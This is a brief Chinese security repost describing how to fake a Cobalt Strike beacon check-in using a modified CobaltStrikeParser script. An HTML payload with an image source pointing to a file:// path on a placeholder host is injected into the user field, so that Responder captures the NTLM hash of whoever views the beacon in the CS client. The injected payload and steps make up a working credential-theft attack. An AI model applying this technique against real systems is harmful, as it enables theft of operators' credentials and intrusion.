Jas502n大佬的思路
使用此工具建立监听:https://github.com/lgandx/Responder
https://github.com/Sentinel-One/CobaltStrikeParser/
修改 comm.py 第39行,为payload:<html>< img src='file://x.x.x.x/xx'%>
伪造上线
CS上线,user 处为我们设置的 payload
Responder 脚本抓到客户机 hash
文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0OTM5MTk0OA==&mid=2247484000&idx=1&sn=f0bd475b00d708a4be5303d169e5866e&chksm=c3584543f42fcc5599eb005dbcb10c524d7f0237fc75b2d8dacbf545b65dc239512ba7392445&mpshare=1&scene=1&srcid=0923dL6noVVtC1RDyHtk0heI&sharer_sharetime=1663936320833&sharer_shareid=205c037363a9188e37dfb6bb4436f95b#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh